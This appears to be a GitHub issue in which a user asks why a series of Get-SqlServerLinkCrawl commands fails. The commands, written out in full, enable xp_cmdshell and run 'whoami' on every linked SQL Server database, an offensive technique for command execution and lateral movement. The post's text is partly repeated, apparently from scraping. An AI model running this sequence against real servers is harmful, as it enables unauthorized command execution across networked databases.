Open aress31 opened 2 years ago
I spent some time trying to figure out the correct syntax to use with Get-SqlServerLinkCrawl to enabled xp_cmdshell and run system commands on all the DB on the links, but no luck. I gave up and switched to impacket mssql instead.
Get-SqlServerLinkCrawl
xp_cmdshell
mssql
The commands I tried are as follows:
Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" ` -Query "EXECUTE('sp_configure ''show advanced options'', 1')" Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" ` -Query "EXECUTE('RECONFIGURE')" Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" ` -Query "EXECUTE('sp_configure xp_cmdshell, 1')" Get-SqlServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" ` -Query "EXECUTE('RECONFIGURE')" Get-SQLServerLinkCrawl -Instance "foobar\SQLEXPRESS" -Username "foo" -Password "bar" ` -Query "EXECUTE('xp_cmdshell whoami')"
If someone could please let me know what is wrong with the above, that would be super!
I spent some time trying to figure out the correct syntax to use with
Get-SqlServerLinkCrawlto enabledxp_cmdshelland run system commands on all the DB on the links, but no luck. I gave up and switched to impacketmssqlinstead.The commands I tried are as follows:
If someone could please let me know what is wrong with the above, that would be super!